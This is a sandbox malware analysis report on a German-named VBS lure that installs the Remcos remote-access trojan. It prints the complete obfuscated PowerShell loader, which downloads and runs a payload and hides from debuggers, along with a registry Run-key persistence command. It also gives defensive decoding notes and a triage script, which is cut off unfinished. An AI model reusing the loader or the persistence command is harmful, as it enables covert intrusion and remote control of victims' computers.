Malware Analysis Report

2025-08-06 01:46

Sample ID 241031-dd3b1swqhs
Target 31102024_0254_Kaufvertrag-Markus-Daten.vbs
SHA256 7e6c9757b46fc71815670a8056b6db913409bb571775642ef865ea633fe41cc9
Tags
execution remcos telou62tos discovery persistence rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7e6c9757b46fc71815670a8056b6db913409bb571775642ef865ea633fe41cc9

Threat Level: Known bad

The file 31102024_0254_Kaufvertrag-Markus-Daten.vbs was found to be: Known bad.

Malicious Activity Summary

execution remcos telou62tos discovery persistence rat

Remcos

Remcos family

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Command and Scripting Interpreter: PowerShell

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-31 02:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-31 02:54

Reported

2024-10-31 02:59

Platform

win7-20240903-en

Max time kernel

300s

Max time network

121s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Description, Indicator, Target: N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Description, Indicator, Target: N/A

Suspicious use of AdjustPrivilegeToken

Description: Token: SeDebugPrivilege
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicator, Target: N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Mastigophobia pigritia Untractarian Rightists Excerpist Damasceres Campaspe #>;$Rhizophoraceae26='Patriarkaternes';<#Precorruptness Regeringsoverhoveder Polianthes Badelagenerne #>; function Mikki($Fremlysningerne174){If ($host.DebuggerEnabled) {$Hugorme++;}$Grafikrutines=$Theomania+$Fremlysningerne174.'Length'-$Hugorme; for ( $Rasterets240=2;$Rasterets240 -lt $Grafikrutines;$Rasterets240+=3){$Dissour=$Rasterets240;$Monistiskes+=$Fremlysningerne174[$Rasterets240];$Jentjenerne='Kontrakternes';}$Monistiskes;}function Forureningsforebyg($Cuddlier){ & ($Matematikemne) ($Cuddlier);}$Vrinsker=Mikki ' uM no Cz Mi elPelF aTi/ a ';$Vaskemaskinens=Mikki ' AT lEpsSc1 2 i ';$Systemkartoteker='Sc[ InKneArt E.Nes .eCurinvBuiBuCCye pPN.oovIFanEpt mStAE nInA CgSkeKaRFo]e : ,:PhsPaemiC ,UU.RT,iBotSuYlip RrL o jtFao RC Mo el S=,e$SiV aa eSvakSles.MEmA,isPakAriMaN Be SN.psN ';$Vrinsker+=Mikki 'Fr5 T.Af0 c Si(NuWAsi .nFid CoRiwInsD. AnN UTDi Mi1B 0 J. ,0ba; a UbWApiTrnSu6 D4 L;pe SyxEm6In4Me; m Clr v M:Ka1I.3,u1 o. C0 F)K. 
GrG neopc ekCooU /I.2 T0Wi1No0Su0 A1Em0 .1De FiFS,iRermueExf Bo Cxbo/ e1Ud3 H1Pr.P,0 a ';$Europaudvalg=Mikki 'V u as eRyrSm- BAAtG UEOvnShTSp ';$Medsster=Mikki 'Ruh .tSttSip ds .: N/P / wL wK wR..A,sAfe LvHaet,n utkookao lA.sCu.TrdFjeja/TiwSvp .-AiaAmdSkmn iCunEl/SwuAfsB.e ar n/WacZyeN,rSluFosS e.o.And Sw Pp u ';$Satieno=Mikki 'Sc>,o ';$Matematikemne=Mikki 'FlI BE sXNo ';$Downstrokes='Islamite212';$Radioavisers148='\Udskriftssiders.boe';Forureningsforebyg (Mikki 'Ad$GyG rLOvONob.aAC.lKo: HFoAF,mS pSiEunGT,AChr hNReeThRBoNTrEP s K=Gu$Hpe CNC,VVe:Ura nPK.p edBeA lT aa ,+,e$crrSaa DTri BOS.aEevInIDoSRoe,nRT S .1S,4B 8Be ');Forureningsforebyg (Mikki 'Du$ GC lS ORebFoaMol C:MiF uoDiR Dk aIArNE.Geu2Fr3Kl3,i= S$ErmVoeBadWrSDeS St ee nR S.,rS GpR,LSkiGat T(Ov$ AsMua.oT ,ILieDynAfOep)B ');Forureningsforebyg (Mikki $Systemkartoteker);$Medsster=$Forking233[0];$Antibiotikaer=(Mikki '.r$PrGGaLbaoC.B A KLRe:Tsi.qn.uDE iBav iAnDM.u.eaEkl.niDeS STGiS a=E,N eEKoWBr-Dyo kBOvJ oe.ac MtSe Rs AYP sT tEfe Amar.Z,n eShT,n.HowT,e AbFiC,elVri.le,eNM.tVe ');Forureningsforebyg ($Antibiotikaer);Forureningsforebyg (Mikki 'In$MuI .nNadmai ovDeiSpdTruGraBilBei HsS tTasF,.,eHs,eShaSid e trPrs o[Ur$ iE,ouUnrCooMipsuaOpuHod v PaBelHyg o]So= r$ IVCor ai Mn HsExk einr r ');$Unbloodiness=Mikki ' Y$ RI .n bdBeiObv riNodMuuGua l iD s Ft PsEu.AdDPeo cw,snArlDroS a dK.FGoi SlAneDe(D.$alMNieSkdFlsSis atS,eParDi, P$ cYPodIneNor iSignoeSksS )Ko ';$Yderiges=$Hampegarnernes;Forureningsforebyg (Mikki ' A$ iG elSeoT B iA AL U:BrKQua,oGLiSHytMirVeyPrg,anTaiOvnAmGKi=Ud(FiT NEFeSFiTB.- PGra UtClHso D$AbYPadWie RRoIOrg eKlsSt)An ');while (!$Kagstrygning) {Forureningsforebyg (Mikki 'Wh$U gUdl oo lbStaSalG.:CiPB h aCosGem SaAftBlr noA,pDaeRe=Un$WrtS r SuPre t ') ;Forureningsforebyg $Unbloodiness;Forureningsforebyg (Mikki 'MuSS.tUnAFlRFotEp-HeSK.lB,e teB,Pam Si4ov ');Forureningsforebyg (Mikki 'In$DaG eLOro FbSta ILR :StKFaaApghos,at FrSayMaG hn Di,rnSogIn= .( nt PE SSraTAn- ,PT AunTb hRe Fd$L.y dC.eKerA IOrgInEAts l) t 
') ;Forureningsforebyg (Mikki 'Co$G,G Sl eoPaBBiaAkLR.: HhClo lReD ,EwapPilThaUddMoS uEKorT = $InGPolErOBabw aBeLMi:A,PEarErO vAfIStaT.NDotUne.inFiS U+My+ A%Fa$H F KOInrSok iI oN Gh.2Un3Em3Wo. .C aoSnUTwNSmTPa ') ;$Medsster=$Forking233[$Holdepladser];}$Lepidodendrids=339347;$merchandise=28186;Forureningsforebyg (Mikki 'Ra$MaG SLTrOGaBBaA LW,:SaSTroO g nO,eDivB eKrj gSPu D =No DegF.eUntBl-roC SoHyn,iT ReMin AtBe .n$Mny,rDFoE.prFlI RGS EUnsL ');Forureningsforebyg (Mikki 'Dd$Pug.ilHvo eb ra l.a:S S HePrrP vC i Cc Se SyUbdnoe ,lt.sMae erPe Sk=,m Sk[DeSMoyPasKot,ae imM .YeC ooPonPtv yeKirNetf.] A: r:KoFMorRuoCam DBj a asC.eRi6Si4.vS.ft,orali MnskgPu(Co$ .SM oOpgH nUde.evFieRajUdsT.)Cl ');Forureningsforebyg (Mikki 'Ov$ G El FoE,bPaa aLha: nu tNB PCyR moT pEmAFlg,laNeN ,D yiFiS uTPeIO,cF. El=Se Sk[ SsDoy,iSH T PE AM F.ret PEDyXSeTla.ApePonOnC oRaDHyIRuNS gIm]Un:Is:KvA ,SSlcE,IM IMe..hgHyeReT sHaT ,rYaIOpN ng V(Ox$,hS ,eS R BVBrIe CUrE AyR dVueA LRgS EUrRSa)H, ');Forureningsforebyg (Mikki 'In$F gS.lH,OOpBEkAUll,n:UnO .POmLA.SExE mlKaI VGDdh SEErDScE PnvoS.d=Ed$A usjnFlP FrUdOAvpA AKogSeAAfn OdUdi VsAntHeiV cSt.MaSS UobBHest t URStIN NR.gCh(B,$ lAeE RpSuIDiDAno PDKoEhaNG DTiRReISpd EsCe,Fy$BamSkED.r,oc H.ea.hNAcd NISiSSqe.n) n ');Forureningsforebyg $Oplselighedens;"
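The command line above is the sample's first PowerShell stage. Every string literal passes through the function the script names Mikki, which keeps only every third character (indices 2, 5, 8, ...); the decoded `$Matematikemne` is `IEX`, so `Forureningsforebyg` is simply Invoke-Expression over each decoded fragment, and the `$host.DebuggerEnabled` test shortens the loop bound by one when a PowerShell debugger is attached, silently dropping the last character of fragments whose length is a multiple of three. The Python below is an added re-implementation written for this page, not code from the sample or the sandbox. The three fragments it decodes are copied from the command line above; the encoder and the constructed mini-script exist only to produce test vectors. One caveat is built in: the rendered command line has collapsed runs of whitespace, so longer fragments no longer line up (the `$Medsster` URL list decodes to `https://` and then falls out of alignment). Run the decoder on the raw command line from the sandbox export or from process-creation telemetry, not on text copied from this page.

```python
import re

# Added example for this report, not code from the sample or the sandbox.
# Re-implements the string decoder the PowerShell stage calls `Mikki`.

# Fragments copied from the powershell.exe command line above. Only short
# fragments survive the whitespace collapsing of the rendered page intact.
REPORT_FRAGMENTS = {
    "Vrinsker": " uM no Cz Mi elPelF aTi/ a ",   # start of the User-Agent string
    "Matematikemne": "FlI BE sXNo ",              # what Forureningsforebyg invokes
    "Satieno": "Sc>,o ",                          # separator used on the URL list
}


def mikki_decode(s: str, debugger_enabled: bool = False) -> str:
    """Emit s[2], s[5], s[8], ... exactly as the original loop does:
        for ($i=2; $i -lt $bound; $i+=3)
    with $bound = $Theomania + $s.Length - $Hugorme. $Theomania is never
    assigned (so 0); $Hugorme is incremented once when $host.DebuggerEnabled
    is true. Under a debugger the bound therefore shrinks by one and the final
    character is dropped whenever len(s) % 3 == 0, which is the anti-analysis
    trick. Decode with debugger_enabled=False to see what the malware sees.
    """
    bound = len(s) - (1 if debugger_enabled else 0)
    return "".join(s[i] for i in range(2, bound, 3))


def mikki_encode(plain: str, pad: str = "xy") -> str:
    """Inverse transform (not present in the sample): two junk characters
    before every real one. Used here only to build test vectors."""
    if len(pad) != 2:
        raise ValueError("pad must be exactly two characters")
    return "".join(pad + c for c in plain)


MIKKI_CALL = re.compile(r"Mikki\s+'([^']*)'")


def decode_all_fragments(script: str, debugger_enabled: bool = False) -> list[str]:
    """Decode every `Mikki '...'` literal in a captured command line, in order.
    Pure string processing: nothing is evaluated, so it is safe on untrusted input."""
    return [mikki_decode(frag, debugger_enabled) for frag in MIKKI_CALL.findall(script)]


def decode_report_fragments() -> dict[str, str]:
    """Decode the fragments copied from this report."""
    return {name: mikki_decode(frag) for name, frag in REPORT_FRAGMENTS.items()}


if __name__ == "__main__":
    for name, value in decode_report_fragments().items():
        print(f"${name} = {value!r}")
    # Constructed mini-script in the sample's style (hypothetical URL).
    demo = "$u=Mikki '%s';$x=(Mikki '%s');" % (
        mikki_encode("https://example.invalid/stage2"), mikki_encode("IEX"))
    print(decode_all_fragments(demo))
    print(decode_all_fragments(demo, debugger_enabled=True))  # last char lost
```

Decoded `$Vrinsker` comes out as `Mozilla/ ` (the rest of the User-Agent is appended by the next fragment), `$Matematikemne` as `IEX` and `$Satieno` as `>`; with `debugger_enabled=True` the trailing character of each multiple-of-three fragment is gone, which is why stepping through this script in a debugger produces broken commands.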

Network

N/A

Files

memory/2988-4-0x000007FEF532E000-0x000007FEF532F000-memory.dmp

memory/2988-5-0x000000001B650000-0x000000001B932000-memory.dmp

memory/2988-6-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/2988-7-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-8-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-10-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-9-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-11-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-12-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-13-0x000007FEF532E000-0x000007FEF532F000-memory.dmp

memory/2988-14-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-15-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-16-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

memory/2988-17-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-31 02:54

Reported

2024-10-31 02:59

Platform

win10v2004-20241007-en

Max time kernel

299s

Max time network

299s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

Checks computer location settings

Description: Key value queried
Indicator: \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation
Process: C:\Windows\System32\WScript.exe
Target: N/A

Adds Run key to start application

persistence
Description: Set value (str)
Indicator: \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ineffableness = "%Disfoliage% -windowstyle 1 $Varetagelsen=(gp -Path 'HKCU:\\Software\\Aetheogamic\\').Lerholdighedens;%Disfoliage% ($Varetagelsen)"
Process: C:\Windows\SysWOW64\reg.exe
Target: N/A

Command and Scripting Interpreter: PowerShell

execution
Processes: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Description, Indicator, Target: N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Description, Indicator, Target: N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Description, Indicator, Target: N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description: Key opened
Indicator: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language
Processes: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; C:\Windows\SysWOW64\cmd.exe; C:\Windows\SysWOW64\reg.exe
Target: N/A

Modifies registry key

Process: C:\Windows\SysWOW64\reg.exe
Description, Indicator, Target: N/A

Suspicious use of AdjustPrivilegeToken

Description: Token: SeDebugPrivilege
Processes: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Indicator, Target: N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31102024_0254_Kaufvertrag-Markus-Daten.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Mastigophobia pigritia Untractarian Rightists Excerpist Damasceres Campaspe #>;$Rhizophoraceae26='Patriarkaternes';<#Precorruptness Regeringsoverhoveder Polianthes Badelagenerne #>; function Mikki($Fremlysningerne174){If ($host.DebuggerEnabled) {$Hugorme++;}$Grafikrutines=$Theomania+$Fremlysningerne174.'Length'-$Hugorme; for ( $Rasterets240=2;$Rasterets240 -lt $Grafikrutines;$Rasterets240+=3){$Dissour=$Rasterets240;$Monistiskes+=$Fremlysningerne174[$Rasterets240];$Jentjenerne='Kontrakternes';}$Monistiskes;}function Forureningsforebyg($Cuddlier){ & ($Matematikemne) ($Cuddlier);}$Vrinsker=Mikki ' uM no Cz Mi elPelF aTi/ a ';$Vaskemaskinens=Mikki ' AT lEpsSc1 2 i ';$Systemkartoteker='Sc[ InKneArt E.Nes .eCurinvBuiBuCCye pPN.oovIFanEpt mStAE nInA CgSkeKaRFo]e : ,:PhsPaemiC ,UU.RT,iBotSuYlip RrL o jtFao RC Mo el S=,e$SiV aa eSvakSles.MEmA,isPakAriMaN Be SN.psN ';$Vrinsker+=Mikki 'Fr5 T.Af0 c Si(NuWAsi .nFid CoRiwInsD. AnN UTDi Mi1B 0 J. ,0ba; a UbWApiTrnSu6 D4 L;pe SyxEm6In4Me; m Clr v M:Ka1I.3,u1 o. C0 F)K. 
GrG neopc ekCooU /I.2 T0Wi1No0Su0 A1Em0 .1De FiFS,iRermueExf Bo Cxbo/ e1Ud3 H1Pr.P,0 a ';$Europaudvalg=Mikki 'V u as eRyrSm- BAAtG UEOvnShTSp ';$Medsster=Mikki 'Ruh .tSttSip ds .: N/P / wL wK wR..A,sAfe LvHaet,n utkookao lA.sCu.TrdFjeja/TiwSvp .-AiaAmdSkmn iCunEl/SwuAfsB.e ar n/WacZyeN,rSluFosS e.o.And Sw Pp u ';$Satieno=Mikki 'Sc>,o ';$Matematikemne=Mikki 'FlI BE sXNo ';$Downstrokes='Islamite212';$Radioavisers148='\Udskriftssiders.boe';Forureningsforebyg (Mikki 'Ad$GyG rLOvONob.aAC.lKo: HFoAF,mS pSiEunGT,AChr hNReeThRBoNTrEP s K=Gu$Hpe CNC,VVe:Ura nPK.p edBeA lT aa ,+,e$crrSaa DTri BOS.aEevInIDoSRoe,nRT S .1S,4B 8Be ');Forureningsforebyg (Mikki 'Du$ GC lS ORebFoaMol C:MiF uoDiR Dk aIArNE.Geu2Fr3Kl3,i= S$ErmVoeBadWrSDeS St ee nR S.,rS GpR,LSkiGat T(Ov$ AsMua.oT ,ILieDynAfOep)B ');Forureningsforebyg (Mikki $Systemkartoteker);$Medsster=$Forking233[0];$Antibiotikaer=(Mikki '.r$PrGGaLbaoC.B A KLRe:Tsi.qn.uDE iBav iAnDM.u.eaEkl.niDeS STGiS a=E,N eEKoWBr-Dyo kBOvJ oe.ac MtSe Rs AYP sT tEfe Amar.Z,n eShT,n.HowT,e AbFiC,elVri.le,eNM.tVe ');Forureningsforebyg ($Antibiotikaer);Forureningsforebyg (Mikki 'In$MuI .nNadmai ovDeiSpdTruGraBilBei HsS tTasF,.,eHs,eShaSid e trPrs o[Ur$ iE,ouUnrCooMipsuaOpuHod v PaBelHyg o]So= r$ IVCor ai Mn HsExk einr r ');$Unbloodiness=Mikki ' Y$ RI .n bdBeiObv riNodMuuGua l iD s Ft PsEu.AdDPeo cw,snArlDroS a dK.FGoi SlAneDe(D.$alMNieSkdFlsSis atS,eParDi, P$ cYPodIneNor iSignoeSksS )Ko ';$Yderiges=$Hampegarnernes;Forureningsforebyg (Mikki ' A$ iG elSeoT B iA AL U:BrKQua,oGLiSHytMirVeyPrg,anTaiOvnAmGKi=Ud(FiT NEFeSFiTB.- PGra UtClHso D$AbYPadWie RRoIOrg eKlsSt)An ');while (!$Kagstrygning) {Forureningsforebyg (Mikki 'Wh$U gUdl oo lbStaSalG.:CiPB h aCosGem SaAftBlr noA,pDaeRe=Un$WrtS r SuPre t ') ;Forureningsforebyg $Unbloodiness;Forureningsforebyg (Mikki 'MuSS.tUnAFlRFotEp-HeSK.lB,e teB,Pam Si4ov ');Forureningsforebyg (Mikki 'In$DaG eLOro FbSta ILR :StKFaaApghos,at FrSayMaG hn Di,rnSogIn= .( nt PE SSraTAn- ,PT AunTb hRe Fd$L.y dC.eKerA IOrgInEAts l) t 
') ;Forureningsforebyg (Mikki 'Co$G,G Sl eoPaBBiaAkLR.: HhClo lReD ,EwapPilThaUddMoS uEKorT = $InGPolErOBabw aBeLMi:A,PEarErO vAfIStaT.NDotUne.inFiS U+My+ A%Fa$H F KOInrSok iI oN Gh.2Un3Em3Wo. .C aoSnUTwNSmTPa ') ;$Medsster=$Forking233[$Holdepladser];}$Lepidodendrids=339347;$merchandise=28186;Forureningsforebyg (Mikki 'Ra$MaG SLTrOGaBBaA LW,:SaSTroO g nO,eDivB eKrj gSPu D =No DegF.eUntBl-roC SoHyn,iT ReMin AtBe .n$Mny,rDFoE.prFlI RGS EUnsL ');Forureningsforebyg (Mikki 'Dd$Pug.ilHvo eb ra l.a:S S HePrrP vC i Cc Se SyUbdnoe ,lt.sMae erPe Sk=,m Sk[DeSMoyPasKot,ae imM .YeC ooPonPtv yeKirNetf.] A: r:KoFMorRuoCam DBj a asC.eRi6Si4.vS.ft,orali MnskgPu(Co$ .SM oOpgH nUde.evFieRajUdsT.)Cl ');Forureningsforebyg (Mikki 'Ov$ G El FoE,bPaa aLha: nu tNB PCyR moT pEmAFlg,laNeN ,D yiFiS uTPeIO,cF. El=Se Sk[ SsDoy,iSH T PE AM F.ret PEDyXSeTla.ApePonOnC oRaDHyIRuNS gIm]Un:Is:KvA ,SSlcE,IM IMe..hgHyeReT sHaT ,rYaIOpN ng V(Ox$,hS ,eS R BVBrIe CUrE AyR dVueA LRgS EUrRSa)H, ');Forureningsforebyg (Mikki 'In$F gS.lH,OOpBEkAUll,n:UnO .POmLA.SExE mlKaI VGDdh SEErDScE PnvoS.d=Ed$A usjnFlP FrUdOAvpA AKogSeAAfn OdUdi VsAntHeiV cSt.MaSS UobBHest t URStIN NR.gCh(B,$ lAeE RpSuIDiDAno PDKoEhaNG DTiRReISpd EsCe,Fy$BamSkED.r,oc H.ea.hNAcd NISiSSqe.n) n ');Forureningsforebyg $Oplselighedens;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Mastigophobia pigritia Untractarian Rightists Excerpist Damasceres Campaspe #>;$Rhizophoraceae26='Patriarkaternes';<#Precorruptness Regeringsoverhoveder Polianthes Badelagenerne #>; function Mikki($Fremlysningerne174){If ($host.DebuggerEnabled) {$Hugorme++;}$Grafikrutines=$Theomania+$Fremlysningerne174.'Length'-$Hugorme; for ( $Rasterets240=2;$Rasterets240 -lt $Grafikrutines;$Rasterets240+=3){$Dissour=$Rasterets240;$Monistiskes+=$Fremlysningerne174[$Rasterets240];$Jentjenerne='Kontrakternes';}$Monistiskes;}function Forureningsforebyg($Cuddlier){ & ($Matematikemne) ($Cuddlier);}$Vrinsker=Mikki ' uM no Cz Mi elPelF aTi/ a ';$Vaskemaskinens=Mikki ' AT lEpsSc1 2 i ';$Systemkartoteker='Sc[ InKneArt E.Nes .eCurinvBuiBuCCye pPN.oovIFanEpt mStAE nInA CgSkeKaRFo]e : ,:PhsPaemiC ,UU.RT,iBotSuYlip RrL o jtFao RC Mo el S=,e$SiV aa eSvakSles.MEmA,isPakAriMaN Be SN.psN ';$Vrinsker+=Mikki 'Fr5 T.Af0 c Si(NuWAsi .nFid CoRiwInsD. AnN UTDi Mi1B 0 J. ,0ba; a UbWApiTrnSu6 D4 L;pe SyxEm6In4Me; m Clr v M:Ka1I.3,u1 o. C0 F)K. 
GrG neopc ekCooU /I.2 T0Wi1No0Su0 A1Em0 .1De FiFS,iRermueExf Bo Cxbo/ e1Ud3 H1Pr.P,0 a ';$Europaudvalg=Mikki 'V u as eRyrSm- BAAtG UEOvnShTSp ';$Medsster=Mikki 'Ruh .tSttSip ds .: N/P / wL wK wR..A,sAfe LvHaet,n utkookao lA.sCu.TrdFjeja/TiwSvp .-AiaAmdSkmn iCunEl/SwuAfsB.e ar n/WacZyeN,rSluFosS e.o.And Sw Pp u ';$Satieno=Mikki 'Sc>,o ';$Matematikemne=Mikki 'FlI BE sXNo ';$Downstrokes='Islamite212';$Radioavisers148='\Udskriftssiders.boe';Forureningsforebyg (Mikki 'Ad$GyG rLOvONob.aAC.lKo: HFoAF,mS pSiEunGT,AChr hNReeThRBoNTrEP s K=Gu$Hpe CNC,VVe:Ura nPK.p edBeA lT aa ,+,e$crrSaa DTri BOS.aEevInIDoSRoe,nRT S .1S,4B 8Be ');Forureningsforebyg (Mikki 'Du$ GC lS ORebFoaMol C:MiF uoDiR Dk aIArNE.Geu2Fr3Kl3,i= S$ErmVoeBadWrSDeS St ee nR S.,rS GpR,LSkiGat T(Ov$ AsMua.oT ,ILieDynAfOep)B ');Forureningsforebyg (Mikki $Systemkartoteker);$Medsster=$Forking233[0];$Antibiotikaer=(Mikki '.r$PrGGaLbaoC.B A KLRe:Tsi.qn.uDE iBav iAnDM.u.eaEkl.niDeS STGiS a=E,N eEKoWBr-Dyo kBOvJ oe.ac MtSe Rs AYP sT tEfe Amar.Z,n eShT,n.HowT,e AbFiC,elVri.le,eNM.tVe ');Forureningsforebyg ($Antibiotikaer);Forureningsforebyg (Mikki 'In$MuI .nNadmai ovDeiSpdTruGraBilBei HsS tTasF,.,eHs,eShaSid e trPrs o[Ur$ iE,ouUnrCooMipsuaOpuHod v PaBelHyg o]So= r$ IVCor ai Mn HsExk einr r ');$Unbloodiness=Mikki ' Y$ RI .n bdBeiObv riNodMuuGua l iD s Ft PsEu.AdDPeo cw,snArlDroS a dK.FGoi SlAneDe(D.$alMNieSkdFlsSis atS,eParDi, P$ cYPodIneNor iSignoeSksS )Ko ';$Yderiges=$Hampegarnernes;Forureningsforebyg (Mikki ' A$ iG elSeoT B iA AL U:BrKQua,oGLiSHytMirVeyPrg,anTaiOvnAmGKi=Ud(FiT NEFeSFiTB.- PGra UtClHso D$AbYPadWie RRoIOrg eKlsSt)An ');while (!$Kagstrygning) {Forureningsforebyg (Mikki 'Wh$U gUdl oo lbStaSalG.:CiPB h aCosGem SaAftBlr noA,pDaeRe=Un$WrtS r SuPre t ') ;Forureningsforebyg $Unbloodiness;Forureningsforebyg (Mikki 'MuSS.tUnAFlRFotEp-HeSK.lB,e teB,Pam Si4ov ');Forureningsforebyg (Mikki 'In$DaG eLOro FbSta ILR :StKFaaApghos,at FrSayMaG hn Di,rnSogIn= .( nt PE SSraTAn- ,PT AunTb hRe Fd$L.y dC.eKerA IOrgInEAts l) t 
') ;Forureningsforebyg (Mikki 'Co$G,G Sl eoPaBBiaAkLR.: HhClo lReD ,EwapPilThaUddMoS uEKorT = $InGPolErOBabw aBeLMi:A,PEarErO vAfIStaT.NDotUne.inFiS U+My+ A%Fa$H F KOInrSok iI oN Gh.2Un3Em3Wo. .C aoSnUTwNSmTPa ') ;$Medsster=$Forking233[$Holdepladser];}$Lepidodendrids=339347;$merchandise=28186;Forureningsforebyg (Mikki 'Ra$MaG SLTrOGaBBaA LW,:SaSTroO g nO,eDivB eKrj gSPu D =No DegF.eUntBl-roC SoHyn,iT ReMin AtBe .n$Mny,rDFoE.prFlI RGS EUnsL ');Forureningsforebyg (Mikki 'Dd$Pug.ilHvo eb ra l.a:S S HePrrP vC i Cc Se SyUbdnoe ,lt.sMae erPe Sk=,m Sk[DeSMoyPasKot,ae imM .YeC ooPonPtv yeKirNetf.] A: r:KoFMorRuoCam DBj a asC.eRi6Si4.vS.ft,orali MnskgPu(Co$ .SM oOpgH nUde.evFieRajUdsT.)Cl ');Forureningsforebyg (Mikki 'Ov$ G El FoE,bPaa aLha: nu tNB PCyR moT pEmAFlg,laNeN ,D yiFiS uTPeIO,cF. El=Se Sk[ SsDoy,iSH T PE AM F.ret PEDyXSeTla.ApePonOnC oRaDHyIRuNS gIm]Un:Is:KvA ,SSlcE,IM IMe..hgHyeReT sHaT ,rYaIOpN ng V(Ox$,hS ,eS R BVBrIe CUrE AyR dVueA LRgS EUrRSa)H, ');Forureningsforebyg (Mikki 'In$F gS.lH,OOpBEkAUll,n:UnO .POmLA.SExE mlKaI VGDdh SEErDScE PnvoS.d=Ed$A usjnFlP FrUdOAvpA AKogSeAAfn OdUdi VsAntHeiV cSt.MaSS UobBHest t URStIN NR.gCh(B,$ lAeE RpSuIDiDAno PDKoEhaNG DTiRReISpd EsCe,Fy$BamSkED.r,oc H.ea.hNAcd NISiSSqe.n) n ');Forureningsforebyg $Oplselighedens;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "ineffableness" /t REG_EXPAND_SZ /d "%Disfoliage% -windowstyle 1 $Varetagelsen=(gp -Path 'HKCU:\Software\Aetheogamic\').Lerholdighedens;%Disfoliage% ($Varetagelsen)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "ineffableness" /t REG_EXPAND_SZ /d "%Disfoliage% -windowstyle 1 $Varetagelsen=(gp -Path 'HKCU:\Software\Aetheogamic\').Lerholdighedens;%Disfoliage% ($Varetagelsen)"
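The Run value written by reg.exe above is the persistence mechanism, and two details in it matter for triage. First, the launcher is hidden behind an environment variable, %Disfoliage%, that this report never shows being defined; REG_EXPAND_SZ values are expanded when Explorer processes the Run key at logon, so the variable has to exist in HKCU\Environment or the machine Environment key by then, and both should be checked on an affected host, together with HKCU\Software\Aetheogamic\Lerholdighedens, which is where the value tells PowerShell to read the next stage from. Second, the value body is PowerShell script text rather than a path, run with `-windowstyle 1` (ProcessWindowStyle.Hidden). The script below is an added example for this page, not sandbox output: it parses the output layout of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run` and flags values with those traits. The listing it runs on is constructed; the `ineffableness` line is the value from this report, the other two are benign entries added for contrast, and the list of standard environment variables is an assumption that may need extending for a given environment.

```python
import re

# Added example for this report; not part of the sandbox output.
# Triage of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

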